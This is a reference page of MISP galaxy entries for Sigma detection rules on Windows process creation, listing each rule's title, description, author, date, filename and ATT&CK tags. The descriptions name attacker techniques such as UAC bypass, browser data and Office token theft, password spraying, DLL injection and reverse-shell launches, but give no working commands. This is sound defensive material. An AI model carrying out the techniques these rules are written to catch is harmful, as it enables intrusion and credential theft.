UUID 68bcd73b-37ef-49cb-95fc-edc809730be6 which can be used as unique global reference for Potential Unquoted Service Path Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_unquoted_service_search.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Suspicious Desktopimgdownldr Command

Detects a suspicious Microsoft desktopimgdownldr execution with parameters used to download files from the Internet

Internal MISP references

UUID bb58aa4a-b80b-415a-a2c0-2f65a4c81009 which can be used as unique global reference for Suspicious Desktopimgdownldr Command in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/07/03
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_desktopimgdownldr_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

HackTool - Certipy Execution

Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.

Internal MISP references

UUID 6938366d-8954-4ddc-baff-c830b3ba8fcd which can be used as unique global reference for HackTool - Certipy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unlikely']
filename proc_creation_win_hktl_certipy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.credential_access', 'attack.t1649']
Related clusters

To see the related clusters, click here.

Potential Commandline Obfuscation Using Escape Characters

Detects potential commandline obfuscation using known escape characters

Internal MISP references

UUID f0cdd048-82dc-4f7a-8a7a-b87a52b6d0fd which can be used as unique global reference for Potential Commandline Obfuscation Using Escape Characters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4
creation_date 2018/12/11
falsepositive ['Unknown']
filename proc_creation_win_susp_cli_obfuscation_escape_char.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1140']
Related clusters

To see the related clusters, click here.

PowerShell DownloadFile

Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line

Internal MISP references

UUID 8f70ac5f-1f6f-4f8e-b454-db19561216c5 which can be used as unique global reference for PowerShell DownloadFile in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/08/28
falsepositive ['Unknown']
filename proc_creation_win_powershell_susp_ps_downloadfile.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.command_and_control', 'attack.t1104', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Unusual Child Process of dns.exe

Detects an unexpected process spawning from dns.exe which may indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)

Internal MISP references

UUID a4e3d776-f12e-42c2-8510-9e6ed1f43ec3 which can be used as unique global reference for Unusual Child Process of dns.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Tim Rauch, Elastic (idea)
creation_date 2022/09/27
falsepositive ['Unknown']
filename proc_creation_win_dns_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Invoke-Obfuscation CLIP+ Launcher

Detects Obfuscated use of Clip.exe to execute PowerShell

Internal MISP references

UUID b222df08-0e07-11eb-adc1-0242ac120002 which can be used as unique global reference for Invoke-Obfuscation CLIP+ Launcher in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jonathan Cheong, oscd.community
creation_date 2020/10/13
falsepositive ['Unknown']
filename proc_creation_win_hktl_invoke_obfuscation_clip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027', 'attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Potential Password Spraying Attempt Using Dsacls.EXE

Detects possible password spraying attempts using Dsacls

Internal MISP references

UUID bac9fb54-2da7-44e9-988f-11e9a5edbc0c which can be used as unique global reference for Potential Password Spraying Attempt Using Dsacls.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/20
falsepositive ['Legitimate use of dsacls to bind to an LDAP session']
filename proc_creation_win_dsacls_password_spray.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

SQLite Chromium Profile Data DB Access

Detect usage of the "sqlite" binary to query databases in Chromium-based browsers for potential data stealing.

Internal MISP references

UUID 24c77512-782b-448a-8950-eddb0785fc71 which can be used as unique global reference for SQLite Chromium Profile Data DB Access in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author TropChaud
creation_date 2022/12/19
falsepositive ['Unknown']
filename proc_creation_win_sqlite_chromium_profile_data.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1539', 'attack.t1555.003', 'attack.collection', 'attack.t1005']
Related clusters

To see the related clusters, click here.

PsExec Service Execution

Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution

Internal MISP references

UUID fdfcbd78-48f1-4a4b-90ac-d82241e368c5 which can be used as unique global reference for PsExec Service Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Thomas Patzke, Romaissa Adjailia, Florian Roth (Nextron Systems)
creation_date 2017/06/12
falsepositive ['Legitimate administrative tasks']
filename proc_creation_win_sysinternals_psexesvc.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Potential DLL Injection Or Execution Using Tracker.exe

Detects potential DLL injection and execution using "Tracker.exe"

Internal MISP references

UUID 148431ce-4b70-403d-8525-fcc2993f29ea which can be used as unique global reference for Potential DLL Injection Or Execution Using Tracker.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Avneet Singh @v3t0_, oscd.community
creation_date 2020/10/18
falsepositive ['Unknown']
filename proc_creation_win_lolbin_tracker.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055.001']
Related clusters

To see the related clusters, click here.

Potentially Suspicious PowerShell Child Processes

Detects potentially suspicious child processes spawned by PowerShell

Internal MISP references

UUID e4b6d2a7-d8a4-4f19-acbd-943c16d90647 which can be used as unique global reference for Potentially Suspicious PowerShell Child Processes in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Tim Shelton
creation_date 2022/04/26
falsepositive ['Some false positive is to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts when needed.']
filename proc_creation_win_powershell_susp_child_processes.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

HackTool - CrackMapExec Process Patterns

Detects suspicious process patterns found in logs when CrackMapExec is used

Internal MISP references

UUID f26307d8-14cd-47e3-a26b-4b4769f24af6 which can be used as unique global reference for HackTool - CrackMapExec Process Patterns in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/03/12
falsepositive ['Unknown']
filename proc_creation_win_hktl_crackmapexec_patterns.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Portable Gpg.EXE Execution

Detects the execution of "gpg.exe" from uncommon location. Often used by ransomware and loaders to decrypt/encrypt data.

Internal MISP references

UUID 77df53a5-1d78-4f32-bc5a-0e7465bd8f41 which can be used as unique global reference for Portable Gpg.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/08/06
falsepositive No established falsepositives
filename proc_creation_win_gpg4win_portable_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1486']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of Manage Engine ServiceDesk

Detects suspicious child processes of the "Manage Engine ServiceDesk Plus" Java web service

Internal MISP references

UUID cea2b7ea-792b-405f-95a1-b903ea06458f which can be used as unique global reference for Suspicious Child Process Of Manage Engine ServiceDesk in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2023/01/18
falsepositive ['Legitimate sub processes started by Manage Engine ServiceDesk Pro']
filename proc_creation_win_java_manageengine_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102']
Related clusters

To see the related clusters, click here.

New Port Forwarding Rule Added Via Netsh.EXE

Detects the execution of netsh commands that configure a new port forwarding (PortProxy) rule

Internal MISP references

UUID 322ed9ec-fcab-4f67-9a34-e7c6aef43614 which can be used as unique global reference for New Port Forwarding Rule Added Via Netsh.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), omkar72, oscd.community, Swachchhanda Shrawan Poudel
creation_date 2019/01/29
falsepositive ['Legitimate administration activity', 'WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)']
filename proc_creation_win_netsh_port_forwarding.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.defense_evasion', 'attack.command_and_control', 'attack.t1090']
Related clusters

To see the related clusters, click here.

Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script

Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state

Internal MISP references

UUID 7aa4e81a-a65c-4e10-9f81-b200eb229d7d which can be used as unique global reference for Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/06/14
falsepositive ['Unknown']
filename proc_creation_win_vmware_toolbox_cmd_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1059']
Related clusters

To see the related clusters, click here.

Potential Execution of Sysinternals Tools

Detects command lines that contain the 'accepteula' flag which could be a sign of execution of one of the Sysinternals tools

Internal MISP references

UUID 7cccd811-7ae9-4ebe-9afd-cb5c406b824b which can be used as unique global reference for Potential Execution of Sysinternals Tools in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis
creation_date 2017/08/28
falsepositive ['Legitimate use of SysInternals tools', 'Programs that use the same command line flag']
filename proc_creation_win_sysinternals_eula_accepted.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1588.002']
Related clusters

To see the related clusters, click here.

Suspicious Schtasks Execution AppData Folder

Detects the creation of a schtask that executes a file from C:\Users\\AppData\Local

Internal MISP references

UUID c5c00f49-b3f9-45a6-997e-cfdecc6e1967 which can be used as unique global reference for Suspicious Schtasks Execution AppData Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/03/15
falsepositive ['Unknown']
filename proc_creation_win_schtasks_appdata_local_system.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.t1053.005', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Suspicious Runscripthelper.exe

Detects execution of powershell scripts via Runscripthelper.exe

Internal MISP references

UUID eca49c87-8a75-4f13-9c73-a5a29e845f03 which can be used as unique global reference for Suspicious Runscripthelper.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_lolbin_runscripthelper.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059', 'attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Disk Cleanup

Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)

Internal MISP references

UUID b697e69c-746f-4a86-9f59-7bfff8eab881 which can be used as unique global reference for UAC Bypass Using Disk Cleanup in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_cleanmgr.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Suspicious Parent Double Extension File Execution

Detect execution of suspicious double extension files in ParentCommandLine

Internal MISP references

UUID 5e6a80c8-2d45-4633-9ef4-fa2671a39c5c which can be used as unique global reference for Suspicious Parent Double Extension File Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/06
falsepositive ['Unknown']
filename proc_creation_win_susp_double_extension_parent.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036.007']
Related clusters

To see the related clusters, click here.

ZOHO Dctask64 Process Injection

Detects suspicious process injection using ZOHO's dctask64.exe

Internal MISP references

UUID 6345b048-8441-43a7-9bed-541133633d7a which can be used as unique global reference for ZOHO Dctask64 Process Injection in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2020/01/28
falsepositive ['Unknown']
filename proc_creation_win_lolbin_dctask64_proc_inject.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1055.001']
Related clusters

To see the related clusters, click here.

UAC Bypass Using Event Viewer RecentViews

Detects the pattern of UAC Bypass using Event Viewer RecentViews

Internal MISP references

UUID 30fc8de7-d833-40c4-96b6-28319fbc4f6c which can be used as unique global reference for UAC Bypass Using Event Viewer RecentViews in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/11/22
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_eventvwr_recentviews.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation']

Imports Registry Key From an ADS

Detects the import of a alternate datastream to the registry with regedit.exe.

Internal MISP references

UUID 0b80ade5-6997-4b1d-99a1-71701778ea61 which can be used as unique global reference for Imports Registry Key From an ADS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Oddvar Moe, Sander Wiebing, oscd.community
creation_date 2020/10/12
falsepositive ['Unknown']
filename proc_creation_win_regedit_import_keys_ads.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1112', 'attack.defense_evasion']
Related clusters

To see the related clusters, click here.

Suspicious Binary In User Directory Spawned From Office Application

Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio)

Internal MISP references

UUID aa3a6f94-890e-4e22-b634-ffdfd54792cc which can be used as unique global reference for Suspicious Binary In User Directory Spawned From Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jason Lynch
creation_date 2019/04/02
falsepositive ['Unknown']
filename proc_creation_win_office_spawn_exe_from_users_directory.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1204.002', 'attack.g0046', 'car.2013-05-002']
Related clusters

To see the related clusters, click here.

Detect Virtualbox Driver Installation OR Starting Of VMs

Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM.

Internal MISP references

UUID bab049ca-7471-4828-9024-38279a4c04da which can be used as unique global reference for Detect Virtualbox Driver Installation OR Starting Of VMs in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe
creation_date 2020/09/26
falsepositive ['This may have false positives on hosts where Virtualbox is legitimately being used for operations']
filename proc_creation_win_virtualbox_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.006', 'attack.t1564']
Related clusters

To see the related clusters, click here.

Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution

Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory.

Internal MISP references

UUID 02b18447-ea83-4b1b-8805-714a8a34546a which can be used as unique global reference for Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/03/06
falsepositive ['Unknown']
filename proc_creation_win_offlinescannershell_mpclient_sideloading.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Data Stealing Via Chromium Headless Debugging

Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control

Internal MISP references

UUID 3e8207c5-fcd2-4ea6-9418-15d45b4890e4 which can be used as unique global reference for Potential Data Stealing Via Chromium Headless Debugging in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Unknown']
filename proc_creation_win_browsers_chromium_headless_debugging.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1185']
Related clusters

To see the related clusters, click here.

Suspicious Office Token Search Via CLI

Detects possible search for office tokens via CLI by looking for the string "eyJ0eX". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.

Internal MISP references

UUID 6d3a3952-6530-44a3-8554-cf17c116c615 which can be used as unique global reference for Suspicious Office Token Search Via CLI in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/10/25
falsepositive ['Unknown']
filename proc_creation_win_susp_office_token_search.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1528']
Related clusters

To see the related clusters, click here.

Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE

Detects potential malicious and unauthorized usage of bcdedit.exe

Internal MISP references

UUID c9fbe8e9-119d-40a6-9b59-dd58a5d84429 which can be used as unique global reference for Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @neu5ron
creation_date 2019/02/07
falsepositive No established falsepositives
filename proc_creation_win_bcdedit_susp_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1070', 'attack.persistence', 'attack.t1542.003']
Related clusters

To see the related clusters, click here.

DirLister Execution

Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files.

Internal MISP references

UUID b4dc61f5-6cce-468e-a608-b48b469feaa2 which can be used as unique global reference for DirLister Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/08/20
falsepositive ['Legitimate use by users']
filename proc_creation_win_dirlister_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1083']
Related clusters

To see the related clusters, click here.

Devtoolslauncher.exe Executes Specified Binary

The Devtoolslauncher.exe executes other binary

Internal MISP references

UUID cc268ac1-42d9-40fd-9ed3-8c4e1a5b87e6 which can be used as unique global reference for Devtoolslauncher.exe Executes Specified Binary in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Beyu Denis, oscd.community (rule), @_felamos (idea)
creation_date 2019/10/12
falsepositive ['Legitimate use of devtoolslauncher.exe by legitimate user']
filename proc_creation_win_lolbin_devtoolslauncher.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

File Encoded To Base64 Via Certutil.EXE

Detects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration

Internal MISP references

UUID e62a9f0c-ca1e-46b2-85d5-a6da77f86d1a which can be used as unique global reference for File Encoded To Base64 Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)
creation_date 2019/02/24
falsepositive ['As this is a general purpose rule, legitimate usage of the encode functionality will trigger some false positives. Apply additional filters accordingly']
filename proc_creation_win_certutil_encode.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Potential Privilege Escalation via Service Permissions Weakness

Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level

Internal MISP references

UUID 0f9c21f1-6a73-4b0e-9809-cb562cb8d981 which can be used as unique global reference for Potential Privilege Escalation via Service Permissions Weakness in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_registry_privilege_escalation_via_service_key.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

Potential Renamed Rundll32 Execution

Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection

Internal MISP references

UUID 2569ed8c-1147-498a-9b8c-2ad3656b10ed which can be used as unique global reference for Potential Renamed Rundll32 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unlikely']
filename proc_creation_win_renamed_rundll32_dllregisterserver.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

New ActiveScriptEventConsumer Created Via Wmic.EXE

Detects WMIC executions in which an event consumer gets created. This could be used to establish persistence

Internal MISP references

UUID ebef4391-1a81-4761-a40a-1db446c0e625 which can be used as unique global reference for New ActiveScriptEventConsumer Created Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/06/25
falsepositive ['Legitimate software creating script event consumers']
filename proc_creation_win_wmic_eventconsumer_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1546.003']
Related clusters

To see the related clusters, click here.

Potential Privilege Escalation To LOCAL SYSTEM

Detects unknown program using commandline flags usually used by tools such as PsExec and PAExec to start programs with SYSTEM Privileges

Internal MISP references

UUID 207b0396-3689-42d9-8399-4222658efc99 which can be used as unique global reference for Potential Privilege Escalation To LOCAL SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/05/22
falsepositive ['Weird admins that rename their tools', 'Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing']
filename proc_creation_win_sysinternals_susp_psexec_paexec_flags.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001']
Related clusters

To see the related clusters, click here.

Possible Privilege Escalation via Weak Service Permissions

Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand

Internal MISP references

UUID d937b75f-a665-4480-88a5-2f20e9f9b22a which can be used as unique global reference for Possible Privilege Escalation via Weak Service Permissions in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1574.011']
Related clusters

To see the related clusters, click here.

ShimCache Flush

Detects actions that clear the local ShimCache and remove forensic evidence

Internal MISP references

UUID b0524451-19af-4efa-a46f-562a977f792e which can be used as unique global reference for ShimCache Flush in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/02/01
falsepositive ['Unknown']
filename proc_creation_win_rundll32_susp_shimcache_flush.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Console CodePage Lookup Via CHCP

Detects use of chcp to look up the system locale value as part of host discovery

Internal MISP references

UUID 7090adee-82e2-4269-bd59-80691e7c6338 which can be used as unique global reference for Console CodePage Lookup Via CHCP in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author _pete_0, TheDFIRReport
creation_date 2022/02/21
falsepositive ["During Anaconda update the 'conda.exe' process will eventually execution the 'chcp' command.", 'Discord was seen using chcp to look up code pages']
filename proc_creation_win_chcp_codepage_lookup.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1614.001']
Related clusters

To see the related clusters, click here.

HackTool - SharPersist Execution

Detects the execution of the hacktool SharPersist - used to deploy various different kinds of persistence mechanisms

Internal MISP references

UUID 26488ad0-f9fd-4536-876f-52fea846a2e4 which can be used as unique global reference for HackTool - SharPersist Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/15
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpersist.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1053']
Related clusters

To see the related clusters, click here.

Suspicious File Characteristics Due to Missing Fields

Detects Executables in the Downloads folder without FileVersion,Description,Product,Company likely created with py2exe

Internal MISP references

UUID 9637e8a5-7131-4f7f-bdc7-2b05d8670c43 which can be used as unique global reference for Suspicious File Characteristics Due to Missing Fields in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Markus Neis, Sander Wiebing
creation_date 2018/11/22
falsepositive ['Unknown']
filename proc_creation_win_susp_file_characteristics.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.006']
Related clusters

To see the related clusters, click here.

Cscript/Wscript Uncommon Script Extension Execution

Detects Wscript/Cscript executing a file with an uncommon (i.e. non-script) extension

Internal MISP references

UUID 99b7460d-c9f1-40d7-a316-1f36f61d52ee which can be used as unique global reference for Cscript/Wscript Uncommon Script Extension Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/15
falsepositive ['Unknown']
filename proc_creation_win_wscript_cscript_uncommon_extension_exec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.005', 'attack.t1059.007']
Related clusters

To see the related clusters, click here.

PUA - 3Proxy Execution

Detects the use of 3proxy, a tiny free proxy server

Internal MISP references

UUID f38a82d2-fba3-4781-b549-525efbec8506 which can be used as unique global reference for PUA - 3Proxy Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/13
falsepositive ['Administrative activity']
filename proc_creation_win_pua_3proxy_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572']
Related clusters

To see the related clusters, click here.

Bypass UAC via WSReset.exe

Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.

Internal MISP references

UUID d797268e-28a9-49a7-b9a8-2f5039011c5c which can be used as unique global reference for Bypass UAC via WSReset.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth
creation_date 2019/10/24
falsepositive ['Unknown sub processes of Wsreset.exe']
filename proc_creation_win_uac_bypass_wsreset.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.defense_evasion', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

Remote Access Tool - UltraViewer Execution

An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)

Internal MISP references

UUID 88656cec-6c3b-487c-82c0-f73ebb805503 which can be used as unique global reference for Remote Access Tool - UltraViewer Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/09/25
falsepositive ['Legitimate use']
filename proc_creation_win_remote_access_tools_ultraviewer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Python Inline Command Execution

Detects execution of python using the "-c" flag. This is could be used as a way to launch a reverse shell or execute live python code.

Internal MISP references

UUID 899133d5-4d7c-4a7f-94ee-27355c879d90 which can be used as unique global reference for Python Inline Command Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/02
falsepositive ['Python libraries that use a flag starting with "-c". Filter according to your environment']
filename proc_creation_win_python_inline_command_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

